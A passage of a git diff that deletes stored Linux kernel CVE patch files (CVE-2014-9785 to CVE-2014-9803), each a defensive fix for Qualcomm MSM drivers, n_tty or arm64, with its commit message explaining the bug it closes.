- bytes_remaining = buf_size;
-
- /* Only one smux for now */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9785/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9785/ANY/0001.patch
deleted file mode 100644
index d2831804..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9785/ANY/0001.patch
+++ /dev/null
@@ -1,66 +0,0 @@
-From b4338420db61f029ca6713a89c41b3a5852b20ce Mon Sep 17 00:00:00 2001
-From: Hariprasad Dhalinarasimha
-Date: Tue, 1 Oct 2013 18:25:21 -0700
-Subject: qseecom: Change __copy_from_user to copy_from_user
-
-__copy_from_user does not do address check, so use
-copy_from_user instead.
-
-Change-Id: I575c0f3c44b55a521c0d42828988c518c0640a29
-Signed-off-by: Hariprasad Dhalinarasimha
----
- drivers/misc/qseecom.c | 10 +++++-----
- 1 file changed, 5 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 04fe140..8e9731f 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -431,7 +431,7 @@ static int qseecom_set_client_mem_param(struct qseecom_dev_handle *data,
- uint32_t len;
-
- /* Copy the relevant information needed for loading the image */
-- if (__copy_from_user(&req, (void __user *)argp, sizeof(req)))
-+ if (copy_from_user(&req, (void __user *)argp, sizeof(req)))
- return -EFAULT;
-
- /* Get the handle of the shared fd */
-@@ -604,7 +604,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp)
- struct qseecom_load_app_ireq load_req;
-
- /* Copy the relevant information needed for loading the image */
-- if (__copy_from_user(&load_img_req,
-+ if (copy_from_user(&load_img_req,
- (void __user *)argp,
- sizeof(struct qseecom_load_img_req))) {
- pr_err("copy_from_user failed\n");
-@@ -875,7 +875,7 @@ static int qseecom_send_service_cmd(struct qseecom_dev_handle *data,
- struct qseecom_send_svc_cmd_req req;
- /*struct qseecom_command_scm_resp resp;*/
-
-- if (__copy_from_user(&req,
-+ if (copy_from_user(&req,
- (void __user *)argp,
- sizeof(req))) {
- pr_err("copy_from_user failed\n");
-@@ -2086,7 +2086,7 @@ static int qseecom_load_external_elf(struct qseecom_dev_handle *data,
- struct qseecom_command_scm_resp resp;
-
- /* Copy the relevant information needed for loading the image */
-- if (__copy_from_user(&load_img_req,
-+ if (copy_from_user(&load_img_req,
- (void __user *)argp,
- sizeof(struct qseecom_load_img_req))) {
- pr_err("copy_from_user failed\n");
-@@ -2248,7 +2248,7 @@ static int qseecom_query_app_loaded(struct qseecom_dev_handle *data,
- unsigned long flags = 0;
-
- /* Copy the relevant information needed for loading the image */
-- if (__copy_from_user(&query_req,
-+ if (copy_from_user(&query_req,
- (void __user *)argp,
- sizeof(struct qseecom_qseos_app_load_query))) {
- pr_err("copy_from_user failed\n");
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9786/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9786/ANY/0001.patch
deleted file mode 100644
index 4832ad38..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9786/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 2fb303d9c6ca080f253b10ed9384293ca69ad32b Mon Sep 17 00:00:00 2001
-From: Vasko Kalanoski
-Date: Tue, 8 Oct 2013 10:50:32 -0700
-Subject: msm: actuator: fix to prevent kernel heap buffer overflow
-
-fix to prevent kernel heap buffer overflow allows user
-controlled data to be written to the heap via the
-msm_camera actuator IOCTLs
-
-Change-Id: I4458831e28e0081fb2f5ae55506be866100e1b4f
-Signed-off-by: Vasko Kalanoski
----
- .../platform/msm/camera_v2/sensor/actuator/msm_actuator.c | 12 ++++++++++--
- 1 file changed, 10 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-index baa2db8..e605326 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-@@ -79,6 +79,11 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,
- struct msm_camera_i2c_reg_array *i2c_tbl = a_ctrl->i2c_reg_tbl;
- CDBG("Enter\n");
- for (i = 0; i < size; i++) {
-+ /* check that the index into i2c_tbl cannot grow larger that
-+ the allocated size of i2c_tbl */
-+ if ((a_ctrl->total_steps + 1) < (a_ctrl->i2c_tbl_index)) {
-+ break;
-+ }
- if (write_arr[i].reg_write_type == MSM_ACTUATOR_WRITE_DAC) {
- value = (next_lens_position <<
- write_arr[i].data_shift) |
-@@ -464,8 +469,11 @@ static int32_t msm_actuator_init(struct msm_actuator_ctrl_t *a_ctrl,
-
- a_ctrl->i2c_data_type = set_info->actuator_params.i2c_data_type;
- a_ctrl->i2c_client.addr_type = set_info->actuator_params.i2c_addr_type;
-- a_ctrl->reg_tbl_size = set_info->actuator_params.reg_tbl_size;
-- if (a_ctrl->reg_tbl_size > MAX_ACTUATOR_REG_TBL_SIZE) {
-+ if (set_info->actuator_params.reg_tbl_size <=
-+ MAX_ACTUATOR_REG_TBL_SIZE) {
-+ a_ctrl->reg_tbl_size = set_info->actuator_params.reg_tbl_size;
-+ } else {
-+ a_ctrl->reg_tbl_size = 0;
- pr_err("MAX_ACTUATOR_REG_TBL_SIZE is exceeded.\n");
- return -EFAULT;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9787/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9787/ANY/0001.patch
deleted file mode 100644
index 3385d66e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9787/ANY/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 528400ae4cba715f6c9ff4a2657dafd913f30b8b Mon Sep 17 00:00:00 2001
-From: Hariprasad Dhalinarasimha
-Date: Thu, 3 Oct 2013 16:43:39 -0700
-Subject: qseecom: Validate the incoming length from user space
-
-Check if there is no integer overflow before using req_len and
-resp_len (received from user space). If an overflow is detected
-then exit the operation.
-
-Change-Id: I0459a6992bb3b280db42be63a275c55fa6105b1c
-Signed-off-by: Hariprasad Dhalinarasimha
----
- drivers/misc/qseecom.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 58703cf..1452908 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -961,6 +961,11 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- return -EINVAL;
- }
-
-+ if (req->cmd_req_len > UINT_MAX - req->resp_len) {
-+ pr_err("Integer overflow detected in req_len & rsp_len, exiting now\n");
-+ return -EINVAL;
-+ }
-+
- reqd_len_sb_in = req->cmd_req_len + req->resp_len;
- if (reqd_len_sb_in > data->client.sb_length) {
- pr_debug("Not enough memory to fit cmd_buf and "
-@@ -980,7 +985,7 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
-
- msm_ion_do_cache_op(qseecom.ion_clnt, data->client.ihandle,
- data->client.sb_virt,
-- (req->cmd_req_len + req->resp_len),
-+ reqd_len_sb_in,
- ION_IOC_CLEAN_INV_CACHES);
-
- ret = scm_call(SCM_SVC_TZSCHEDULER, 1, (const void *) &send_data_req,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9788/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9788/ANY/0001.patch
deleted file mode 100644
index 6453d7aa..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9788/ANY/0001.patch
+++ /dev/null
@@ -1,194 +0,0 @@
-From 73bfc22aa70cc0b7e6709381125a0a42aa72a4f2 Mon Sep 17 00:00:00 2001
-From: Shiv Maliyappanahalli
-Date: Wed, 2 Oct 2013 17:00:30 -0700
-Subject: ASoC: msm: qdsp6v2: Fix buffer overflow in voice driver
-
-Userspace registers calibration data with acdb driver
-through ioctls. Voice driver registers the calibration
-data with CVD by querying acdb data from acdb driver and
-copies the calibration data in apr message.
-
-The size of the calibration data can be controlled by userspace
-and can result in buffer overflow if the calibration size is
-greater than the destination buffer size.
-
-Reject acdb data if the size is greater than the size of
-destination buffer.
-
-CRs-Fixed: 548872
-Change-Id: I4cd23a38c90b745226ddbc28656c82ff7c10432b
-Signed-off-by: Shiv Maliyappanahalli
----
- sound/soc/msm/qdsp6/q6voice.c | 9 ++++++---
- sound/soc/msm/qdsp6v2/q6voice.c | 53 ++++++++++++++++++++++++++++++++++-------
- 2 files changed, 50 insertions(+), 12 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6/q6voice.c b/sound/soc/msm/qdsp6/q6voice.c
-index 0e53c64..7294350 100644
---- a/sound/soc/msm/qdsp6/q6voice.c
-+++ b/sound/soc/msm/qdsp6/q6voice.c
-@@ -1519,7 +1519,8 @@ static int voice_send_cvs_register_cal_cmd(struct voice_data *v)
-
- /* get the cvs cal data */
- get_all_vocstrm_cal(&cal_block);
-- if (cal_block.cal_size == 0)
-+ if (cal_block.cal_size == 0 ||
-+ cal_block.cal_size > CVS_CAL_SIZE)
- goto fail;
-
- if (v == NULL) {
-@@ -1928,7 +1929,8 @@ static int voice_send_cvp_register_cal_cmd(struct voice_data *v)
-
- /* get the cvp cal data */
- get_all_vocproc_cal(&cal_block);
-- if (cal_block.cal_size == 0)
-+ if (cal_block.cal_size == 0 ||
-+ cal_block.cal_size > CVP_CAL_SIZE)
- goto fail;
-
- if (v == NULL) {
-@@ -2063,7 +2065,8 @@ static int voice_send_cvp_register_vol_cal_table_cmd(struct voice_data *v)
- get_all_vocvol_cal(&vol_block);
- get_all_vocproc_cal(&voc_block);
-
-- if (vol_block.cal_size == 0)
-+ if (vol_block.cal_size == 0 ||
-+ vol_block.cal_size > CVP_CAL_SIZE)
- goto fail;
-
- if (v == NULL) {
-diff --git a/sound/soc/msm/qdsp6v2/q6voice.c b/sound/soc/msm/qdsp6v2/q6voice.c
-index 079cc4d..622fae1 100644
---- a/sound/soc/msm/qdsp6v2/q6voice.c
-+++ b/sound/soc/msm/qdsp6v2/q6voice.c
-@@ -1955,20 +1955,22 @@ static int voice_send_cvs_register_cal_cmd(struct voice_data *v)
- if (!common.apr_q6_cvs) {
- pr_err("%s: apr_cvs is NULL\n", __func__);
-
-- ret = -EPERM;
-+ ret = -EINVAL;
- goto done;
- }
-
- if (!common.cal_mem_handle) {
- pr_err("%s: Cal mem handle is NULL\n", __func__);
-- ret = -EPERM;
-+
-+ ret = -EINVAL;
- goto done;
- }
-
- get_vocstrm_cal(&cal_block);
- if (cal_block.cal_size == 0) {
- pr_err("%s: CVS cal size is 0\n", __func__);
-- ret = -EPERM;
-+
-+ ret = -EINVAL;
- goto done;
- }
-
-@@ -1989,6 +1991,15 @@ static int voice_send_cvs_register_cal_cmd(struct voice_data *v)
-
- /* Get the column info corresponding to CVS cal from ACDB. */
- get_voice_col_data(VOCSTRM_CAL, &cal_block);
-+ if (cal_block.cal_size == 0 ||
-+ cal_block.cal_size >
-+ sizeof(cvs_reg_cal_cmd.cvs_cal_data.column_info)) {
-+ pr_err("%s: Invalid VOCSTRM_CAL size %d\n",
-+ __func__, cal_block.cal_size);
-+
-+ ret = -EINVAL;
-+ goto done;
-+ }
- memcpy(&cvs_reg_cal_cmd.cvs_cal_data.column_info[0],
- (void *) cal_block.cal_kvaddr,
- cal_block.cal_size);
-@@ -2227,20 +2238,22 @@ static int voice_send_cvp_register_cal_cmd(struct voice_data *v)
- if (!common.apr_q6_cvp) {
- pr_err("%s: apr_cvp is NULL\n", __func__);
-
-- ret = -EPERM;
-+ ret = -EINVAL;
- goto done;
- }
-
- if (!common.cal_mem_handle) {
- pr_err("%s: Cal mem handle is NULL\n", __func__);
-- ret = -EPERM;
-+
-+ ret = -EINVAL;
- goto done;
- }
-
- get_vocproc_cal(&cal_block);
- if (cal_block.cal_size == 0) {
- pr_err("%s: CVP cal size is 0\n", __func__);
-- ret = -EPERM;
-+
-+ ret = -EINVAL;
- goto done;
- }
-
-@@ -2261,6 +2274,16 @@ static int voice_send_cvp_register_cal_cmd(struct voice_data *v)
-
- /* Get the column info corresponding to CVP cal from ACDB. */
- get_voice_col_data(VOCPROC_CAL, &cal_block);
-+ if (cal_block.cal_size == 0 ||
-+ cal_block.cal_size >
-+ sizeof(cvp_reg_cal_cmd.cvp_cal_data.column_info)) {
-+ pr_err("%s: Invalid VOCPROC_CAL size %d\n",
-+ __func__, cal_block.cal_size);
-+
-+ ret = -EINVAL;
-+ goto done;
-+ }
-+
- memcpy(&cvp_reg_cal_cmd.cvp_cal_data.column_info[0],
- (void *) cal_block.cal_kvaddr,
- cal_block.cal_size);
-@@ -2363,20 +2386,22 @@ static int voice_send_cvp_register_vol_cal_cmd(struct voice_data *v)
- if (!common.apr_q6_cvp) {
- pr_err("%s: apr_cvp is NULL\n", __func__);
-
-- ret = -EPERM;
-+ ret = -EINVAL;
- goto done;
- }
-
- if (!common.cal_mem_handle) {
- pr_err("%s: Cal mem handle is NULL\n", __func__);
-- ret = -EPERM;
-+
-+ ret = -EINVAL;
- goto done;
- }
-
- get_vocvol_cal(&cal_block);
- if (cal_block.cal_size == 0) {
- pr_err("%s: CVP vol cal size is 0\n", __func__);
-- ret = -EPERM;
-+
-+ ret = -EINVAL;
- goto done;
- }
-
-@@ -2399,6 +2424,16 @@ static int voice_send_cvp_register_vol_cal_cmd(struct voice_data *v)
-
- /* Get the column info corresponding to CVP volume cal from ACDB. */
- get_voice_col_data(VOCVOL_CAL, &cal_block);
-+ if (cal_block.cal_size == 0 ||
-+ cal_block.cal_size >
-+ sizeof(cvp_reg_vol_cal_cmd.cvp_vol_cal_data.column_info)) {
-+ pr_err("%s: Invalid VOCVOL_CAL size %d\n",
-+ __func__, cal_block.cal_size);
-+
-+ ret = -EINVAL;
-+ goto done;
-+ }
-+
- memcpy(&cvp_reg_vol_cal_cmd.cvp_vol_cal_data.column_info[0],
- (void *) cal_block.cal_kvaddr,
- cal_block.cal_size);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9789/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9789/ANY/0001.patch
deleted file mode 100644
index 1a5639ba..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9789/ANY/0001.patch
+++ /dev/null
@@ -1,105 +0,0 @@
-From 5720ed5c3a786e3ba0a2428ac45da5d7ec996b4e Mon Sep 17 00:00:00 2001
-From: Gopikrishnaiah Anandan
-Date: Fri, 16 Aug 2013 17:34:21 -0400
-Subject: Soc: msm: qdsp6v2: Fix invalid params handling
-
-Alloc and free apis should sanity check all input params.
-If allocation fails set client and ion handle to NULL.
-
-Change-Id: Ide3bd782eb90ee8b033e39de232929a1ca7174b7
-Signed-off-by: Gopikrishnaiah Anandan
----
- arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c | 30 +++++++++++++++++++++++++-----
- 1 file changed, 25 insertions(+), 5 deletions(-)
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c b/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c
-index 0c71659..f9e9d6d 100644
---- a/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c
-+++ b/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c
-@@ -53,7 +53,11 @@ int msm_audio_ion_alloc(const char *name, struct ion_client **client,
- pr_debug("%s:probe is not done, deferred\n", __func__);
- return -EPROBE_DEFER;
- }
--
-+ if (!name || !client || !handle || !paddr || !vaddr
-+ || !bufsz || !pa_len) {
-+ pr_err("%s: Invalid params\n", __func__);
-+ return -EINVAL;
-+ }
- *client = msm_audio_ion_client_create(UINT_MAX, name);
- if (IS_ERR_OR_NULL((void *)(*client))) {
- pr_err("%s: ION create client for AUDIO failed\n", __func__);
-@@ -102,9 +106,9 @@ int msm_audio_ion_alloc(const char *name, struct ion_client **client,
-
- err_ion_handle:
- ion_free(*client, *handle);
-- *handle = NULL;
- err_ion_client:
- msm_audio_ion_client_destroy(*client);
-+ *handle = NULL;
- *client = NULL;
- err:
- return -EINVAL;
-@@ -116,10 +120,17 @@ int msm_audio_ion_import(const char *name, struct ion_client **client,
- ion_phys_addr_t *paddr, size_t *pa_len, void **vaddr)
- {
- int rc = 0;
-+ if (!name || !client || !handle || !ionflag || !paddr || !vaddr
-+ || !bufsz || !pa_len) {
-+ pr_err("%s: Invalid params\n", __func__);
-+ rc = -EINVAL;
-+ goto err;
-+ }
-
- *client = msm_audio_ion_client_create(UINT_MAX, name);
- if (IS_ERR_OR_NULL((void *)(*client))) {
- pr_err("%s: ION create client for AUDIO failed\n", __func__);
-+ rc = -EINVAL;
- goto err;
- }
-
-@@ -132,8 +143,9 @@ int msm_audio_ion_import(const char *name, struct ion_client **client,
- if (IS_ERR_OR_NULL((void *) (*handle))) {
- pr_err("%s: ion import dma buffer failed\n",
- __func__);
-- goto err_ion_handle;
-- }
-+ rc = -EINVAL;
-+ goto err_destroy_client;
-+ }
-
- if (ionflag != NULL) {
- rc = ion_handle_get_flags(*client, *handle, ionflag);
-@@ -154,6 +166,7 @@ int msm_audio_ion_import(const char *name, struct ion_client **client,
- *vaddr = ion_map_kernel(*client, *handle);
- if (IS_ERR_OR_NULL((void *)*vaddr)) {
- pr_err("%s: ION memory mapping for AUDIO failed\n", __func__);
-+ rc = -ENOMEM;
- goto err_ion_handle;
- }
- pr_debug("%s: mapped address = %p, size=%d\n", __func__, *vaddr, bufsz);
-@@ -162,13 +175,20 @@ int msm_audio_ion_import(const char *name, struct ion_client **client,
-
- err_ion_handle:
- ion_free(*client, *handle);
-+err_destroy_client:
- msm_audio_ion_client_destroy(*client);
-+ *client = NULL;
-+ *handle = NULL;
- err:
-- return -EINVAL;
-+ return rc;
- }
-
- int msm_audio_ion_free(struct ion_client *client, struct ion_handle *handle)
- {
-+ if (!client || !handle) {
-+ pr_err("%s Invalid params\n", __func__);
-+ return -EINVAL;
-+ }
- if (msm_audio_ion_data.smmu_enabled) {
- /* Need to populate book kept infomation */
- pr_debug("client=%p, domain=%p, domain_id=%d, group=%p",
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9790/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9790/ANY/0001.patch
deleted file mode 100644
index 2ff79139..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9790/ANY/0001.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From 6ed921bda8cbb505e8654dfc1095185b0bccc38e Mon Sep 17 00:00:00 2001
-From: Raviv Shvili
-Date: Tue, 1 Oct 2013 17:18:29 +0300
-Subject: mmc: core : fix arbitrary read/write to user space
-
-In the MMC card debug_fs the read and write handlers use the strlcat
-and sscanf, without checking the pointer given.
-Since the pointer is not checked it is possible to write
-everywhere (ring 0 or 3).
-In order to fix it, an access_ok function is being used to verify
-the buffer's pointer supplied by user is valid.
-
-CRs-fixed: 545716
-Change-Id: Ia710b6af5a95974fc930ca902e8ff18afa4e17ba
-Signed-off-by: Raviv Shvili
----
- drivers/mmc/core/debugfs.c | 10 ++++++++++
- 1 file changed, 10 insertions(+)
-
-diff --git a/drivers/mmc/core/debugfs.c b/drivers/mmc/core/debugfs.c
-index 903decf..9897f9f 100644
---- a/drivers/mmc/core/debugfs.c
-+++ b/drivers/mmc/core/debugfs.c
-@@ -15,6 +15,7 @@
- #include
- #include
- #include
-+#include
-
- #include
- #include
-@@ -392,6 +393,9 @@ static ssize_t mmc_wr_pack_stats_read(struct file *filp, char __user *ubuf,
- if (!card)
- return cnt;
-
-+ if (!access_ok(VERIFY_WRITE, ubuf, cnt))
-+ return cnt;
-+
- if (!card->wr_pack_stats.print_in_read)
- return 0;
-
-@@ -532,6 +536,9 @@ static ssize_t mmc_wr_pack_stats_write(struct file *filp,
- if (!card)
- return cnt;
-
-+ if (!access_ok(VERIFY_READ, ubuf, cnt))
-+ return cnt;
-+
- sscanf(ubuf, "%d", &value);
- if (value) {
- mmc_blk_init_packed_statistics(card);
-@@ -571,6 +578,9 @@ static ssize_t mmc_bkops_stats_read(struct file *filp, char __user *ubuf,
- if (!card)
- return cnt;
-
-+ if (!access_ok(VERIFY_WRITE, ubuf, cnt))
-+ return cnt;
-+
- bkops_stats = &card->bkops_info.bkops_stats;
-
- if (!bkops_stats->print_stats)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9790/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-9790/ANY/0002.patch
deleted file mode 100644
index cd6b4669..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9790/ANY/0002.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From 9bc30c0d1832f7dd5b6fa10d5e48a29025176569 Mon Sep 17 00:00:00 2001
-From: Raviv Shvili
-Date: Thu, 31 Oct 2013 17:38:19 +0200
-Subject: mmc: core : fix arbitrary read/write to user space
-
-In the MMC card debug_fs the read and write handlers use the strlcat
-and sscanf, without checking the pointer given.
-Since the pointer is not checked it is possible to write
-everywhere (ring 0 or 3).
-In order to fix it, an access_ok function is being used to verify
-the buffer's pointer supplied by user is valid.
-
-CRs-fixed: 545716
-
-Change-Id: I13ca736337fefe29ff9b0df6a318e7d92240f8b2
-Signed-off-by: Raviv Shvili
----
- drivers/mmc/core/debugfs.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/mmc/core/debugfs.c b/drivers/mmc/core/debugfs.c
-index 9897f9f..4ec8941 100644
---- a/drivers/mmc/core/debugfs.c
-+++ b/drivers/mmc/core/debugfs.c
-@@ -647,6 +647,9 @@ static ssize_t mmc_bkops_stats_write(struct file *filp,
- if (!card)
- return cnt;
-
-+ if (!access_ok(VERIFY_READ, ubuf, cnt))
-+ return cnt;
-+
- bkops_stats = &card->bkops_info.bkops_stats;
-
- sscanf(ubuf, "%d", &value);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9791/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9791/ANY/0001.patch
deleted file mode 100644
index b7c78569..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9791/ANY/0001.patch
+++ /dev/null
@@ -1,83 +0,0 @@
-From 9aabfc9e7775abbbcf534cdecccc4f12ee423b27 Mon Sep 17 00:00:00 2001
-From: Peter Hurley
-Date: Tue, 13 May 2014 14:36:46 -0700
-Subject: n_tty: Fix n_tty_write crash when echoing in raw mode
-
-The tty atomic_write_lock does not provide an exclusion guarantee for
-the tty driver if the termios settings are LECHO & !OPOST. And since
-it is unexpected and not allowed to call TTY buffer helpers like
-tty_insert_flip_string concurrently, this may lead to crashes when
-concurrect writers call pty_write. In that case the following two
-writers:
-* the ECHOing from a workqueue and
-* pty_write from the process
-race and can overflow the corresponding TTY buffer like follows.
-
-If we look into tty_insert_flip_string_fixed_flag, there is:
- int space = __tty_buffer_request_room(port, goal, flags);
- struct tty_buffer *tb = port->buf.tail;
- ...
- memcpy(char_buf_ptr(tb, tb->used), chars, space);
- ...
- tb->used += space;
-
-so the race of the two can result in something like this:
- A B
- __tty_buffer_request_room
- __tty_buffer_request_room
- memcpy(buf(tb->used), ...)
- tb->used += space;
- memcpy(buf(tb->used), ...) ->BOOM
-
-B's memcpy is past the tty_buffer due to the previous A's tb->used
-increment.
-
-Since the N_TTY line discipline input processing can output
-concurrently with a tty write, obtain the N_TTY ldisc output_lock to
-serialize echo output with normal tty writes. This ensures the tty
-buffer helper tty_insert_flip_string is not called concurrently and
-everything is fine.
-
-Note that this is nicely reproducible by an ordinary user using
-forkpty and some setup around that (raw termios + ECHO). And it is
-present in kernels at least after commit
-d945cb9cce20ac7143c2de8d88b187f62db99bdc (pty: Rework the pty layer to
-use the normal buffering logic) in 2.6.31-rc3.
-
-js: add more info to the commit log
-js: switch to bool
-js: lock unconditionally
-js: lock only the tty->ops->write call
-
-Signed-off-by: Peter Hurley
-Signed-off-by: Jiri Slaby
-Signed-off-by: Greg Kroah-Hartman
-Change-Id: I9e235db6ec2bb950f26bd8a23f6145dab5dc0a15
-Git-commit: 4291086b1f081b869c6d79e5b7441633dc3ace00
-Git-repo: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
-Signed-off-by: Avijit Kanti Das
-[rsiddoji@codeaurora.org: resolve trivial merge conflicts]
-Signed-off-by: Ravi Kumar S
----
- drivers/tty/n_tty.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c
-index 8eb5573..54c46c8 100644
---- a/drivers/tty/n_tty.c
-+++ b/drivers/tty/n_tty.c
-@@ -1998,8 +1998,11 @@ static ssize_t n_tty_write(struct tty_struct *tty, struct file *file,
- if (tty->ops->flush_chars)
- tty->ops->flush_chars(tty);
- } else {
-+
- while (nr > 0) {
-+ mutex_lock(&tty->output_lock);
- c = tty->ops->write(tty, b, nr);
-+ mutex_unlock(&tty->output_lock);
- if (c < 0) {
- retval = c;
- goto break_out;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9792/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9792/ANY/0001.patch
deleted file mode 100644
index d063f53d..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9792/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From a3e3dd9fc0a2699ae053ffd3efb52cdc73ad94cd Mon Sep 17 00:00:00 2001
-From: Zaheerulla Meer
-Date: Fri, 11 Oct 2013 18:18:35 +0530
-Subject: msm: ipc: Possible memory corruption due to Sign Conversion
-
-msm_ipc_router_skb_to_buf() takes an unsigned argument and assigns the
-same to a signed local variable. This might cause issues when the value
-of the argument is too high.
-
-Change the datatype of the local variable to unsigned.
-
-CRs-Fixed: 550606
-Change-Id: I257a095681dd82fba05367fd6faf25820e95c719
-Signed-off-by: Zaheerulla Meer
----
- arch/arm/mach-msm/ipc_router.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/arch/arm/mach-msm/ipc_router.c b/arch/arm/mach-msm/ipc_router.c
-index 9cdad6a1..cb9ad4c 100644
---- a/arch/arm/mach-msm/ipc_router.c
-+++ b/arch/arm/mach-msm/ipc_router.c
-@@ -434,7 +434,7 @@ static void *msm_ipc_router_skb_to_buf(struct sk_buff_head *skb_head,
- unsigned int len)
- {
- struct sk_buff *temp;
-- int offset = 0, buf_len = 0, copy_len;
-+ unsigned int offset = 0, buf_len = 0, copy_len;
- void *buf;
-
- if (!skb_head) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9803/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9803/ANY/0001.patch
deleted file mode 100644
index 408e8ea9..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9803/ANY/0001.patch
+++ /dev/null
@@ -1,70 +0,0 @@
-From 5a0fdfada3a2aa50d7b947a2e958bf00cbe0d830 Mon Sep 17 00:00:00 2001
-From: Catalin Marinas
-Date: Fri, 16 May 2014 16:44:32 +0100
-Subject: Revert "arm64: Introduce execute-only page access permissions"
-
-This reverts commit bc07c2c6e9ed125d362af0214b6313dca180cb08.
-
-While the aim is increased security for --x memory maps, it does not
-protect against kernel level reads. Until SECCOMP is implemented for
-arm64, revert this patch to avoid giving a false idea of execute-only
-mappings.
-
-Signed-off-by: Catalin Marinas
----
- arch/arm64/include/asm/pgtable.h | 11 +++++------
- 1 file changed, 5 insertions(+), 6 deletions(-)
-
-(limited to 'arch/arm64/include/asm/pgtable.h')
-
-diff --git a/arch/arm64/include/asm/pgtable.h b/arch/arm64/include/asm/pgtable.h
-index e4c60d6..aa150ed 100644
---- a/arch/arm64/include/asm/pgtable.h
-+++ b/arch/arm64/include/asm/pgtable.h
-@@ -86,13 +86,12 @@ extern void __pgd_error(const char *file, int line, unsigned long val);
- #define PAGE_COPY_EXEC __pgprot(_PAGE_DEFAULT | PTE_USER | PTE_NG | PTE_PXN)
- #define PAGE_READONLY __pgprot(_PAGE_DEFAULT | PTE_USER | PTE_NG | PTE_PXN | PTE_UXN)
- #define PAGE_READONLY_EXEC __pgprot(_PAGE_DEFAULT | PTE_USER | PTE_NG | PTE_PXN)
--#define PAGE_EXECONLY __pgprot(_PAGE_DEFAULT | PTE_NG | PTE_PXN)
-
- #define __P000 PAGE_NONE
- #define __P001 PAGE_READONLY
- #define __P010 PAGE_COPY
- #define __P011 PAGE_COPY
--#define __P100 PAGE_EXECONLY
-+#define __P100 PAGE_READONLY_EXEC
- #define __P101 PAGE_READONLY_EXEC
- #define __P110 PAGE_COPY_EXEC
- #define __P111 PAGE_COPY_EXEC
-@@ -101,7 +100,7 @@ extern void __pgd_error(const char *file, int line, unsigned long val);
- #define __S001 PAGE_READONLY
- #define __S010 PAGE_SHARED
- #define __S011 PAGE_SHARED
--#define __S100 PAGE_EXECONLY
-+#define __S100 PAGE_READONLY_EXEC
- #define __S101 PAGE_READONLY_EXEC
- #define __S110 PAGE_SHARED_EXEC
- #define __S111 PAGE_SHARED_EXEC
-@@ -137,8 +136,8 @@ extern struct page *empty_zero_page;
- #define pte_write(pte) (!!(pte_val(pte) & PTE_WRITE))
- #define pte_exec(pte) (!(pte_val(pte) & PTE_UXN))
-
--#define pte_valid_ng(pte) \
-- ((pte_val(pte) & (PTE_VALID | PTE_NG)) == (PTE_VALID | PTE_NG))
-+#define pte_valid_user(pte) \
-+ ((pte_val(pte) & (PTE_VALID | PTE_USER)) == (PTE_VALID | PTE_USER))
-
- static inline pte_t pte_wrprotect(pte_t pte)
- {
